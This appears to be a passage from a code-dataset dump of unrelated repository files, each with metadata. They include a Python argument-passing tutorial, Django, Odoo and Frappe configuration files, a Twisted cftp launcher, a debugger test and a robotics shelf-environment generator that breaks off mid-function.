b255fdf34e22a4165490cdca3b6a1c6e64f12f1d | 8d2a124753905fb0455f624b7c76792c32fac070 | /pytnon-month01/month01-shibw-notes/day08-shibw/demo02-函数实参传递方式.py | 8552c39f1fd88ff02da5f27af317be220d475eb2 | [] | no_license | Jeremy277/exercise | f38e4f19aae074c804d265f6a1c49709fd2cae15 | a72dd82eb2424e4ae18e2f3e9cc66fc4762ec8fa | refs/heads/master | 2020-07-27T09:14:00.286145 | 2019-09-17T11:31:44 | 2019-09-17T11:31:44 | 209,041,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,069 | py | '''
函数传参
实参传递方式
'''
def fun01(a,b,c):  # formal parameters: a, b, c
    """Print each of the three positional arguments on its own line.

    Used to demonstrate the different ways actual arguments can be passed.
    """
    print(a)
    print(b)
    print(c)
# Positional arguments: actual arguments are matched to formal parameters
# by position.
# Changing the order of the actual arguments changes the function's output.
# fun01(10,20,30)
# fun01(30,10,20)
# Sequence arguments: use * to unpack the elements of a sequence so they
# are matched to the formal parameters one by one.
# Sequences: strings, lists, tuples.
list01 = [10,20,30]
fun01(*list01)
# str01 = 'abcd'
# fun01(*str01)  # raises an error (4 items for 3 parameters)
# Keyword arguments:
# each actual argument value is matched to a formal parameter by name.
# fun01(a=10,b=20,c=30)
# With keyword arguments the order of the arguments does not matter.
# fun01(c=30,a=10,b=20)
# fun01(a=10,b=20,d=40)  # error: there is no parameter named d
# Dict arguments: use ** to unpack a dict; its key/value pairs are passed
# to the function as keyword arguments.
dict01 = {'a':10,'b':20,'c':30}
# a = 10 , b = 20 ,c = 30
fun01(**dict01)
# The dict keys must match the formal parameter names.
# dict01 = {'a':10,'e':20,'d':30}
# fun01(**dict01)  # raises an error
# Mixed usage:
# the syntax requires positional arguments before keyword arguments.
# fun01(10,20,c=30)
# fun01(c=30,b=20,10)  # raises a SyntaxError
# fun01(10,c=30,b=20)
| [
"13572093824@163.com"
] | 13572093824@163.com |
4153e5a0a7053f1238faf6b9925f4b00dfa351d3 | 3f4f2bb867bf46818802c87f2f321a593f68aa90 | /smile/bin/cftp | f013e4cd473d18741239a41ee15b8ee6fe9ecd80 | [] | no_license | bopopescu/Dentist | 56f5d3af4dc7464544fbfc73773c7f21a825212d | 0122a91c1f0d3d9da125234a8758dea802cd38f0 | refs/heads/master | 2022-11-23T12:42:23.434740 | 2016-09-19T15:42:36 | 2016-09-19T15:42:36 | 282,608,405 | 0 | 0 | null | 2020-07-26T08:30:16 | 2020-07-26T08:30:16 | null | UTF-8 | Python | false | false | 358 | #!/SHARED-THINGS/ONGOING/We.smile/smile/bin/python
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
import sys, os
# Make the grandparent directory of this script importable so the optional
# ``_preamble`` module (present when running from a source checkout) can be
# found.
extra = os.path.dirname(os.path.dirname(sys.argv[0]))
sys.path.insert(0, extra)
try:
    import _preamble
except ImportError:
    # Not running from a checkout: drop the extra path entry again.
    # NOTE(review): sys.exc_clear() exists only on Python 2.
    sys.exc_clear()
    sys.path.remove(extra)
# Delegate to Twisted's cftp entry point.
from twisted.conch.scripts.cftp import run
run()
| [
"jamaalaraheem@gmail.com"
] | jamaalaraheem@gmail.com | |
60899e33a7c3f1dfccf1acbed4b358ea6a036956 | bf8b1335af2d9b77943d440908be1f94931493c9 | /lession3/jinja/jinja/wsgi.py | 177b069f883f281c7c4f2fba4e1f18e96fcb2df2 | [] | no_license | OctopusLian/django-lession | 9e8e6727815f30ad79972aee956055d7c01c9692 | 8f6f88c53702884c99fc0c6048c1019735f16fd3 | refs/heads/master | 2023-06-05T22:01:09.298618 | 2021-06-24T07:45:44 | 2021-06-24T07:45:44 | 377,732,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | """
WSGI config for jinja project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings module before building the app.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'jinja.settings')
# Module-level WSGI callable that servers (gunicorn, uWSGI, ...) import.
application = get_wsgi_application()
| [
"zoctopus@qq.com"
] | zoctopus@qq.com |
c0aad22b53d52c82359598c5146e7be5d057ac21 | ac8785aab837876a7595925cba2b5a09d6cb3a9f | /exam_question/apps.py | f7eca37bf7588c1f5bc88337e80ceb855a725f55 | [] | no_license | MayowaFunmi/django-cbt-onlineschool-app | 9ffb388baec9515314035b7cf1faeae60006df66 | f98741a299303643fa58a8f98aff0ab885402404 | refs/heads/master | 2023-01-02T08:52:51.570801 | 2020-10-28T00:09:30 | 2020-10-28T00:09:30 | 307,857,845 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | from django.apps import AppConfig
class ExamQuestionConfig(AppConfig):
    """Django application configuration for the ``exam_question`` app."""

    # Dotted path Django uses to locate this application.
    name = 'exam_question'
| [
"akinade.mayowa@gmail.com"
] | akinade.mayowa@gmail.com |
ee3a35c8ea73fb5fd4cbd78944d7dd7318dfa7b2 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/helpers/pydev/pydev_tests_python/resources/_debugger_case_set_next_statement.py | 145f36d596c3dbca63ea3726dfa41035f960a000 | [
"EPL-1.0",
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 169 | py | def method():
a = 1
print('call %s' % (a,))
a = 2
print('call %s' % (a,))
a = 3
if __name__ == '__main__':
method()
print('TEST SUCEEDED!')
| [
"Elizaveta.Shashkova@jetbrains.com"
] | Elizaveta.Shashkova@jetbrains.com |
1da139e0f1926e0aebc7e93d592604dcfb4edf72 | 8d920a35fda0ba351a6fb5e7d6cb2b570d6f1ec6 | /grp_ejecucion_presupuestal/__openerp__.py | 21ef1b0627f49b703a741c5e18df87a2f6e4ca67 | [] | no_license | suningwz/odoo-coreuy | afeb661a1c6bd16e7804f2bd7df9ebe9dda7bab8 | d723860324e3d914a0a44bac14dd83eceefc96fe | refs/heads/master | 2020-09-14T22:43:17.884212 | 2019-07-03T13:48:50 | 2019-07-03T13:48:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,555 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Enterprise Management Solution
# GRP Estado Uruguay
# Copyright (C) 2017 Quanam (ATEL SA., Uruguay)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'GRP - Ejecución presupuestal SIIF',
'version': '1.0',
'author': 'Quanam',
'website': 'www.quanam.com',
'category': '',
'images': [],
'depends': ['grp_factura_siif'],
'description': """
GRP - Vista ejecución presupuestal SIIF años futuros
""",
'demo': [],
'data': [
'security/ir.model.access.csv',
'report/grp_ejecucion_presupuestal_siif_view.xml',
'report/grp_ejecucion_presupuestal_siif_documentos_view.xml',
],
'installable': True,
'auto_install': False,
}
| [
"lcontreras@sofis.com.uy"
] | lcontreras@sofis.com.uy |
cf72b166ab3a1fcf4523e0f20acf976d34f5e402 | ab8187626aa68c1f92301db78e9f8b0c4b088554 | /TwoPointer/75_h.py | a8a07b4bde84c80b9ccb625d2074edf0ebb7ed68 | [] | no_license | khj68/algorithm | 2818f87671019f9f2305ec761fd226e737f12025 | efebe142b9b52e966e0436be3b87fb32b4f7ea32 | refs/heads/master | 2023-04-25T02:33:13.403943 | 2021-05-04T03:09:38 | 2021-05-04T03:09:38 | 287,733,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 737 | py | class Solution:
def sortColors(self, nums: List[int]) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
zeroP, twoP = 0, len(nums)-1
i = 0
while i <= twoP:
try:
while nums[zeroP] == 0: zeroP += 1
while nums[twoP] == 2: twoP -= 1
except:
print('error')
return
# print(zeroP, twoP)
if nums[i] == 0 and i > zeroP:
nums[i], nums[zeroP] = nums[zeroP], nums[i]
elif nums[i] == 2 and i < twoP:
nums[i], nums[twoP] = nums[twoP], nums[i]
else:
i += 1
| [
"maga40@naver.com"
] | maga40@naver.com |
51b14fca6562f512f53b9bd7533a151120bba916 | 128090f08a541eaf52a39bd811147e16fbcd2ef5 | /certificate/hooks.py | 9fd93618a5e0d2acdf2aa4969765c66f2e5bb01a | [
"MIT"
] | permissive | hrgadeha/certificate | e92d420773d2bdfafa641fb1239a38f21db54ee4 | b742679f0002f63a6afd4950b9f20903f9c8dc4b | refs/heads/master | 2020-03-31T12:59:00.530854 | 2018-10-23T07:13:23 | 2018-10-23T07:13:23 | 152,236,987 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,849 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from . import __version__ as app_version
# Frappe app metadata consumed by the framework's app registry / installer.
app_name = "certificate"
app_title = "Certificate"
app_publisher = "Hardik Gadesha"
app_description = "Custom Certificate for Employee and Company"
app_icon = "octicon octicon-file-directory"
app_color = "grey"
app_email = "hardikgadesha@gmail.com"
app_license = "MIT"
# Includes in <head>
# ------------------
# include js, css files in header of desk.html
# app_include_css = "/assets/certificate/css/certificate.css"
# app_include_js = "/assets/certificate/js/certificate.js"
# include js, css files in header of web template
# web_include_css = "/assets/certificate/css/certificate.css"
# web_include_js = "/assets/certificate/js/certificate.js"
# include js in page
# page_js = {"page" : "public/js/file.js"}
# include js in doctype views
# doctype_js = {"doctype" : "public/js/doctype.js"}
# doctype_list_js = {"doctype" : "public/js/doctype_list.js"}
# doctype_tree_js = {"doctype" : "public/js/doctype_tree.js"}
# doctype_calendar_js = {"doctype" : "public/js/doctype_calendar.js"}
# Home Pages
# ----------
# application home page (will override Website Settings)
# home_page = "login"
# website user home page (by Role)
# role_home_page = {
# "Role": "home_page"
# }
# Website user home page (by function)
# get_website_user_home_page = "certificate.utils.get_home_page"
# Generators
# ----------
# automatically create page for each record of this doctype
# website_generators = ["Web Page"]
# Installation
# ------------
# before_install = "certificate.install.before_install"
# after_install = "certificate.install.after_install"
# Desk Notifications
# ------------------
# See frappe.core.notifications.get_notification_config
# notification_config = "certificate.notifications.get_notification_config"
# Permissions
# -----------
# Permissions evaluated in scripted ways
# permission_query_conditions = {
# "Event": "frappe.desk.doctype.event.event.get_permission_query_conditions",
# }
#
# has_permission = {
# "Event": "frappe.desk.doctype.event.event.has_permission",
# }
# Document Events
# ---------------
# Hook on document methods and events
# doc_events = {
# "*": {
# "on_update": "method",
# "on_cancel": "method",
# "on_trash": "method"
# }
# }
# Scheduled Tasks
# ---------------
# Frappe scheduler hooks: run both certificate mail jobs daily at midnight.
# Cron syntax: minute hour day-of-month month day-of-week.
scheduler_events = {
    "cron": {
        "0 0 * * *": [
            "certificate.certificate.doctype.certificate.certificate.emp_cert_mail",
            "certificate.certificate.doctype.certificate.certificate.company_cert_mail"
        ]
    }
}
# Testing
# -------
# before_tests = "certificate.install.before_tests"
# Overriding Whitelisted Methods
# ------------------------------
#
# override_whitelisted_methods = {
# "frappe.desk.doctype.event.event.get_events": "certificate.event.get_events"
# }
| [
"you@example.com"
] | you@example.com |
cf52e79ed7afa2539ea55264e23fcd537bac3203 | 5ff50855146d8519457903fecebaf6f9f534b6ed | /gtamp_problem_environments/mover_environment_definition.py | c4cc0d8ff00ecfebb7c48333e1bb2a8678372d3a | [] | no_license | lukeshimanuki/guiding_gtamp_light | 9bc5f3a2b97d2bb16f3d47b5bc4b1280fc591d6f | 651061a400aca998b3a3a85ea8030b2c5432552a | refs/heads/master | 2023-01-13T05:52:57.170550 | 2020-07-01T01:07:33 | 2020-07-01T01:07:33 | 256,593,351 | 0 | 0 | null | 2020-04-17T19:37:04 | 2020-04-17T19:37:03 | null | UTF-8 | Python | false | false | 25,645 | py | import sys
# from manipulation.constants import PARALLEL_LEFT_ARM, REST_LEFT_ARM, HOLDING_LEFT_ARM, FOLDED_LEFT_ARM, \
# FAR_HOLDING_LEFT_ARM, LOWER_TOP_HOLDING_LEFT_ARM, REGION_Z_OFFSET
from gtamp_utils.utils import *
from gtamp_utils import utils
from manipulation.bodies.bodies import place_body, place_body_on_floor
from manipulation.primitives.transforms import set_point
from manipulation.regions import create_region, AARegion
import os
import random
# obj definitions
min_height = 0.4
max_height = 1
min_width = 0.2
max_width = 0.6
min_length = 0.2
max_length = 0.6
OBST_COLOR = (1, 0, 0)
OBST_TRANSPARENCY = .25
N_OBJS = 10
def generate_rand(min, max):
    """Draw a uniform random float from the half-open interval [min, max).

    NOTE(review): the parameter names shadow the builtins ``min``/``max``;
    they are kept for interface compatibility with existing callers.
    """
    span = max - min
    return min + span * np.random.rand()
def create_objects(env, obj_region, n_objects):
    """Create ``n_objects`` randomly sized boxes, add them to ``env`` and
    place each one at a random pose inside ``obj_region``.

    Returns
    -------
    (OBJECTS, obj_poses, obj_shapes)
        The list of created bodies, a dict of their placement poses and a
        dict of their [width, length, height] shapes, keyed by 'obj<i>'.
    """
    OBJECTS = []
    obj_shapes = {}
    obj_poses = {}
    for i in range(n_objects):
        width = np.random.rand(1) * (max_width - min_width) + min_width
        # BUG FIX: the length was previously sampled with ``max_width`` as
        # its upper bound; use ``max_length`` so the configured length range
        # is honored.
        length = np.random.rand(1) * (max_length - min_length) + min_length
        height = np.random.rand(1) * (max_height - min_height) + min_height
        new_body = box_body(env, width, length, height,
                            name='obj%s' % i,
                            color=(0, (i + .5) / n_objects, 0))
        # Lift the body slightly so it does not start intersecting the floor.
        trans = np.eye(4)
        trans[2, -1] = 0.075
        env.Add(new_body)
        new_body.SetTransform(trans)
        obj_pose = randomly_place_region(new_body, obj_region)  # TODO fix this to return xytheta
        OBJECTS.append(new_body)
        obj_shapes['obj%s' % i] = [width[0], length[0], height[0]]
        obj_poses['obj%s' % i] = obj_pose
    return OBJECTS, obj_poses, obj_shapes
def load_objects(env, obj_shapes, obj_poses, color):
    # sets up the object at their locations in the original env
    """Recreate boxes from saved shapes and poses and add them to ``env``.

    ``obj_shapes`` maps names to [width, length, height]; each entry of
    ``obj_poses`` is assumed to be a dict with 'obj_xyz' and 'obj_rot'
    (quaternion) keys — TODO confirm against the saver.
    Returns the list of created bodies.
    """
    OBJECTS = []
    i = 0
    nobj = len(obj_shapes.keys())
    for obj_name in obj_shapes.keys():
        obj_xyz = obj_poses[obj_name]['obj_xyz']
        obj_rot = obj_poses[obj_name]['obj_rot']
        width, length, height = obj_shapes[obj_name]
        # Later objects get a brighter shade of the base color (divisor
        # shrinks from nobj down to 1).
        new_body = box_body(env, width, length, height,
                            name=obj_name,
                            color=np.array(color) / float(nobj - i))
        i += 1
        env.Add(new_body)
        set_point(new_body, obj_xyz)
        set_quat(new_body, obj_rot)
        OBJECTS.append(new_body)
    return OBJECTS
def create_bottom_walls(x_lim, y_lim, env):
    """Build the room: a floor plate, three solid side walls and an entrance
    gap in the fourth wall, all parented to 'bottom_wall'.
    """
    # Floor plate; its center is shifted to x_lim/2 along x.
    bottom_wall = box_body(env, x_lim * 2, y_lim * 2, 0.135, name='bottom_wall', color=(.82, .70, .55))
    bottom_wall_x = x_lim / 2.0
    set_xy(bottom_wall, bottom_wall_x, 0)
    env.Add(bottom_wall)
    # Two walls along y at the left/right x extents (rotated by pi/2).
    side_wall = box_body(env, y_lim * 2, 0.01 * 2, 0.2 * 2,
                         name='side_wall_1',
                         color=(.82, .70, .55))
    place_body(env, side_wall, (-x_lim + bottom_wall_x, 0, np.pi / 2), base_name='bottom_wall')
    side_wall = box_body(env, y_lim * 2, 0.01 * 2, 0.2 * 2,
                         name='side_wall_2',
                         color=(.82, .70, .55))
    place_body(env, side_wall, (x_lim + bottom_wall_x, 0, np.pi / 2), base_name='bottom_wall')
    # Back wall along x at +y_lim.
    side_wall = box_body(env, x_lim * 2, 0.01 * 2, 0.2 * 2,
                         name='side_wall_3',
                         color=(.82, .70, .55))
    place_body(env, side_wall, (bottom_wall_x, y_lim, 0), base_name='bottom_wall')
    # Front wall at -y_lim is split into two segments, leaving an entrance
    # gap; the gap is deliberately off-center (left segment is 2 shorter
    # than the right).
    entrance_width = 1.2
    left_door_length = (x_lim - entrance_width / 2.0) - 1
    right_door_length = (x_lim - entrance_width / 2.0) + 1
    entrance_left = box_body(env, left_door_length, 0.01 * 2, 0.2 * 2,
                             name='entrance_left',
                             color=(.82, .70, .55))
    entrance_right = box_body(env, right_door_length, 0.01 * 2, 0.2 * 2,
                              name='entrance_right',
                              color=(.82, .70, .55))
    place_body(env, entrance_left, (bottom_wall_x + (-x_lim - (entrance_width / 2.0 + 1)) / 2.0, -y_lim, 0),
               base_name='bottom_wall')
    place_body(env, entrance_right, (bottom_wall_x + (x_lim + (entrance_width / 2.0 - 1)) / 2.0, -y_lim, 0),
               base_name='bottom_wall')
    # place_body(env, env.GetKinBody('Cabinet'), (x_lim + x_lim / 3.0 - 0.5, y_lim - 3, np.pi), base_name='bottom_wall')
def create_doors(x_lim, y_lim, door_x, door_y, door_width, th, env):
    """Create a doorway: two wall segments flanking a gap of ``door_width``
    centered at (door_x, door_y), oriented by ``th``.

    ``th`` must be 0 (door axis along y) or np.pi/2 (door axis along x).

    Raises
    ------
    ValueError
        If ``th`` is neither 0 nor np.pi/2.  (Previously this case fell
        through and raised a confusing NameError on the first use of the
        unassigned wall sizes.)
    """
    if th == 0:
        right_wall_size = (door_y - door_width / 2.0 - (-y_lim)) / 2.0
        left_wall_size = (y_lim - door_width / 2.0 - door_y) / 2.0
    elif th == np.pi / 2.:
        right_wall_size = (door_x - door_width / 2.0 - (-x_lim)) / 2.0
        left_wall_size = (x_lim - door_width / 2.0 - door_x) / 2.0
    else:
        raise ValueError('th must be 0 or np.pi/2, got %r' % (th,))
    left_wall = box_body(env,
                         0.04 * 2, left_wall_size * 2, 1 * 2,
                         name='left_wall',
                         color=(.82, .70, .55))
    right_wall = box_body(env,
                          0.04 * 2, right_wall_size * 2, 1 * 2,
                          name='right_wall',
                          color=(.82, .70, .55))
    # Offset each segment from the door center by half the gap plus half
    # its own length, along the axis selected by th.
    if th == 0:
        place_body(env, left_wall, (door_x, door_y + left_wall_size + (door_width / 2.), th),
                   base_name='bottom_wall')
        place_body(env, right_wall, (door_x, door_y - right_wall_size - (door_width / 2.), th),
                   base_name='bottom_wall')
    else:
        place_body(env, left_wall, (door_x + left_wall_size + (door_width / 2.), door_y, th),
                   base_name='bottom_wall')
        place_body(env, right_wall, (door_x - right_wall_size - (door_width / 2.), door_y, th),
                   base_name='bottom_wall')
    set_body_transparency(left_wall, 0.3)
    set_body_transparency(right_wall, 0.3)
def create_box_bodies(body_shape, color, name, n_objs, env):
    """Create ``n_objs`` box bodies with per-index shapes and a color graded
    by index.

    Parameters
    ----------
    body_shape : sequence of (width, length, height) triples, one per body.
    color : str
        One of 'green', 'red' or 'blue'.  NOTE(review): the RGB tuples do
        not literally match these names (e.g. 'green' grades the G channel
        on a red base) — preserved as-is from the original.
    name : str
        Name prefix; bodies are named ``name0 .. name{n_objs-1}``.
    n_objs : int
        Number of bodies to create.
    env : environment the bodies are created in.

    Raises
    ------
    ValueError
        If ``color`` is unsupported.  (Previously an unknown color fell
        through and raised NameError on the return statement.)
    """
    # Per-index RGB grading for each supported color name.
    color_for_index = {
        'green': lambda i: (1, (i + .5) / 5, 0),
        'red': lambda i: ((i + .5) / 5, 0, 1),
        'blue': lambda i: (0, 1, (i + .5) / 5),
    }
    if color not in color_for_index:
        raise ValueError("color must be one of %s, got %r"
                         % (sorted(color_for_index), color))
    make_color = color_for_index[color]
    box_bodies = [box_body(env, body_shape[i][0], body_shape[i][1], body_shape[i][2],
                           name=name + '%s' % i, color=make_color(i))
                  for i in range(n_objs)]
    return box_bodies
def generate_shelf_shapes():
    """Sample dimensions for the left/right shelves and return them together
    with the fixed center-shelf dimensions and the side-shelf x offsets.

    Returns
    -------
    (shelf_shapes, shelf_xs) : (dict, dict)
        ``shelf_shapes`` maps dimension names to values; ``shelf_xs`` holds
        the x-coordinates of the left/right shelf centers, flush against
        the center shelf.
    """
    widest = 0.7
    narrowest = 0.4

    # The randomized dimensions are drawn in the same order as before so
    # the consumed random stream (and thus seeded behavior) is unchanged.
    right_width = generate_rand(narrowest, widest)
    left_width = generate_rand(narrowest, widest)
    left_height = generate_rand(0.3, 0.5)
    left_top_height = generate_rand(0.3, 0.5)
    right_height = generate_rand(0.3, 0.5)
    right_top_height = generate_rand(0.3, 0.5)

    # The center shelf has fixed dimensions.
    center_width = 1
    center_height = 0.26
    center_top_height = 0.7

    shelf_shapes = {'center_shelf_top_height': center_top_height,
                    'center_shelf_height': center_height,
                    'left_shelf_top_height': left_top_height,
                    'left_shelf_height': left_height,
                    'right_shelf_top_height': right_top_height,
                    'right_shelf_height': right_height,
                    'center_shelf_width': center_width,
                    'left_shelf_width': left_width,
                    'right_shelf_width': right_width}

    shelf_xs = {
        'left_x': center_width / 2.0 + left_width / 2.0,
        'right_x': -center_width / 2.0 - right_width / 2.0,
    }
    return shelf_shapes, shelf_xs
def create_shelf(env, obst_x, obst_width, obst_height, name_idx, stacked_obj_name, table_name):
    """Build one open-front shelf (left/right/back walls plus a top plate)
    on top of ``stacked_obj_name``, anchored relative to ``table_name``.

    Only the bottom shelf (``name_idx == 1``) also gets a floor plate and an
    associated placement region; for every other index ``None`` is returned.

    BUG FIX: ``region`` used to be returned unconditionally but was only
    assigned for ``name_idx == 1``, so any other index (e.g. the
    ``name_idx=2`` call in create_shelves) raised UnboundLocalError.
    """
    region = None  # only the name_idx == 1 shelf produces a region
    width = 0.25
    length = 0.01
    height = obst_height
    top_wall_width = 0.001
    bottom_wall_width = 0.0001
    # Anchor the shelf geometry relative to the supporting table's AABB.
    table_pos = aabb_from_body(env.GetKinBody(table_name)).pos()
    table_x = table_pos[0] - 0.18
    table_y = table_pos[1]
    place_body(env,
               box_body(env,
                        width, length, height,
                        name='right_wall_' + str(name_idx),
                        color=OBST_COLOR,
                        transparency=OBST_TRANSPARENCY),
               (table_x + .0, table_y + obst_x - (obst_width - .05) / 2, 0),
               stacked_obj_name)
    place_body(env,
               box_body(env,
                        width, length, height,
                        name='left_wall_' + str(name_idx),
                        color=OBST_COLOR,
                        transparency=OBST_TRANSPARENCY),
               (table_x + .0, table_y + obst_x + (obst_width - .05) / 2, 0),
               stacked_obj_name)
    place_body(env,
               box_body(env,
                        length, obst_width - 0.05, height,
                        name='back_wall_' + str(name_idx),
                        color=OBST_COLOR,
                        transparency=OBST_TRANSPARENCY),
               (table_x + .225, table_y + obst_x, 0),
               stacked_obj_name)
    # Thin top plate resting on the back wall.
    place_body(env,
               box_body(env,
                        width, obst_width - 0.05, top_wall_width,
                        name='top_wall_' + str(name_idx),
                        color=OBST_COLOR,
                        transparency=OBST_TRANSPARENCY),
               (table_x + 0, table_y + obst_x, 0),
               'back_wall_' + str(name_idx))
    if name_idx == 1:
        # The bottom shelf also gets a floor plate to place objects on.
        place_body(env,
                   box_body(env,
                            width, obst_width - 0.05, bottom_wall_width,
                            name='bottom_wall_' + str(name_idx),
                            color=OBST_COLOR,
                            transparency=0.5),
                   (table_x + 0, table_y + obst_x, 0),
                   stacked_obj_name)
    if name_idx == 1:
        region = create_region(env, 'place_region_' + str(name_idx),
                               ((-1.0, 1.0), (-0.85, 0.85)),
                               'bottom_wall_' + str(name_idx), color=np.array((0, 0, 0, .5)))
        # viewer()
        # region.draw(env)
    return region
# remove region name entity_names
def set_fixed_object_poses(env, x_lim, y_lim):
    """Place the fixed furniture (shelves, table, chair) in the room and
    return a name -> pose dict for the tracked bodies.
    """
    objects = [env.GetKinBody('shelf1'), env.GetKinBody('shelf2'), env.GetKinBody('computer_table'),
               env.GetKinBody('table2')]
    place_body(env, env.GetKinBody('shelf1'), (x_lim + x_lim / 2.0 - 0.5, y_lim - 0.2, np.pi * 3 / 2),
               base_name='bottom_wall')
    place_body(env, env.GetKinBody('shelf2'), (x_lim + x_lim / 2.0 - 1.5, y_lim - 0.2, np.pi * 3 / 2),
               base_name='bottom_wall')
    place_body(env, env.GetKinBody('table2'), (x_lim + x_lim / 2.0 - 0.5, y_lim - 3, np.pi * 3 / 2),
               base_name='bottom_wall')
    place_body(env, env.GetKinBody('computer_chair'), (4.2, -1.5, 0), base_name='bottom_wall')
    # NOTE(review): 'computer_table' is in the returned dict but never
    # re-placed here, while 'computer_chair' is placed but not returned —
    # confirm this asymmetry is intended.
    obj_poses = {obj.GetName(): get_pose(obj) for obj in objects}
    return obj_poses
def create_shelves(env, shelf_shapes, shelf_xs, table_name):
    """Create the center shelf (and its top tier) on ``table_name`` and
    return its placement region(s).

    The left/right shelves are currently disabled (see the commented-out
    block below); only the 'center' region is returned.
    NOTE(review): create_shelf only builds a region for name_idx == 1, so
    the name_idx=2 call depends on create_shelf handling other indices —
    confirm.
    """
    center_shelf_width = shelf_shapes['center_shelf_width']
    center_shelf_height = shelf_shapes['center_shelf_height']
    center_shelf_top_height = shelf_shapes['center_shelf_top_height']
    # left_shelf_width = shelf_shapes['left_shelf_width']
    # left_shelf_height = shelf_shapes['left_shelf_height']
    # left_shelf_top_height = shelf_shapes['left_shelf_top_height']
    # right_shelf_width = shelf_shapes['right_shelf_width']
    # right_shelf_height = shelf_shapes['right_shelf_height']
    # right_shelf_top_height = shelf_shapes['right_shelf_top_height']
    # Kept for the disabled left/right shelves below.
    left_x = shelf_xs['left_x']
    right_x = shelf_xs['right_x']
    center_region = create_shelf(env, obst_x=0, obst_width=center_shelf_width,
                                 obst_height=center_shelf_height, name_idx=1, stacked_obj_name=table_name,
                                 table_name=table_name)
    center_top_region = create_shelf(env, obst_x=0, obst_width=center_shelf_width,
                                     obst_height=center_shelf_top_height, name_idx=2,
                                     stacked_obj_name='back_wall_1', table_name=table_name)
    """
    left_region = create_shelf(env, obst_x=left_x, obst_width=left_shelf_width,
                               obst_height=left_shelf_height, name_idx=3, stacked_obj_name=table_name,
                               table_name=table_name)
    left_top_region = create_shelf(env, obst_x=left_x, obst_width=left_shelf_width,
                                   obst_height=left_shelf_top_height, name_idx=4,
                                   stacked_obj_name='back_wall_3', table_name=table_name)
    right_region = create_shelf(env, obst_x=right_x, obst_width=right_shelf_width,
                                obst_height=right_shelf_height, name_idx=5, stacked_obj_name=table_name,
                                table_name=table_name)
    right_top_region = create_shelf(env, obst_x=right_x, obst_width=right_shelf_width,
                                    obst_height=right_shelf_top_height, name_idx=6,
                                    stacked_obj_name='back_wall_5', table_name=table_name)
    """
    # regions = {'center': center_region, 'center_top': center_top_region,
    #           'left': left_region, 'left_top': left_top_region}
    # 'right': right_region, 'right_top': right_top_region}
    # regions = {'center': center_region, 'center_top': center_top_region}
    regions = {'center': center_region}
    return regions
def generate_shelf_obj_shapes(n_objs=None):
    """Return per-region lists of object [width, length, height] shapes.

    All objects are 0.05 x 0.05 boxes of the same height (0.20).

    Parameters
    ----------
    n_objs : int, optional
        Number of shapes per region.  Defaults to the module-level
        ``N_OBJS`` (the previous, hard-coded behavior), so existing callers
        are unaffected.

    Returns
    -------
    dict mapping region keys ('l_obj_shapes', 'ltop_obj_shapes',
    'c_obj_shapes', 'ctop_obj_shapes', 'r_obj_shapes', 'rtop_obj_shapes')
    to independent lists of independent shape lists.
    """
    if n_objs is None:
        n_objs = N_OBJS
    same_height = 0.20

    def _shapes():
        # Fresh inner lists each call so callers can mutate independently.
        return [[0.05, 0.05, same_height] for _ in range(n_objs)]

    obj_shapes = {'l_obj_shapes': _shapes(), 'ltop_obj_shapes': _shapes(),
                  'c_obj_shapes': _shapes(), 'ctop_obj_shapes': _shapes(),
                  'r_obj_shapes': _shapes(), 'rtop_obj_shapes': _shapes()}
    return obj_shapes
def create_shelf_objs(env, obj_shapes):
    """Create the movable box bodies that populate the shelf regions.

    Only the center-shelf objects are currently created; the left/right and
    top-shelf variants are commented out (matching the reduced region set in
    create_shelves).

    Args:
        env: environment the box bodies are added to (presumably an OpenRAVE
            environment — confirm with create_box_bodies).
        obj_shapes: dict from generate_shelf_obj_shapes().

    Returns:
        dict mapping region name (currently only 'center') to its list of
        created box bodies.
    """
    # left_objs = create_box_bodies(obj_shapes['l_obj_shapes'], color='green', name='l_obst', n_objs=n_objs,
    #                               env=env)
    # left_top_objs = create_box_bodies(obj_shapes['ltop_obj_shapes'], color='green', name='ltop_obst',
    #                                   n_objs=n_objs, env=env)
    center_objs = create_box_bodies(obj_shapes['c_obj_shapes'], color='blue', name='c_obst', n_objs=N_OBJS, env=env)
    # center_top_objs = create_box_bodies(obj_shapes['ctop_obj_shapes'], color='blue', name='ctop_obst', n_objs=N_OBJS,
    #                                     env=env)
    # right_objs = create_box_bodies(obj_shapes['r_obj_shapes'], color='red', name='r_obst',
    #                                n_objs=n_objs, env=env)
    # right_top_objs = create_box_bodies(obj_shapes['rtop_obj_shapes'], color='red', name='rtop_obst',
    #                                    n_objs=n_objs, env=env)
    # objects = { # 'left': left_objs, 'left_top': left_top_objs,
    #             'center': center_objs, 'center_top': center_top_objs,
    #             'right': right_objs, 'right_top': right_top_objs}
    # objects = {'center': center_objs, 'center_top': center_top_objs}
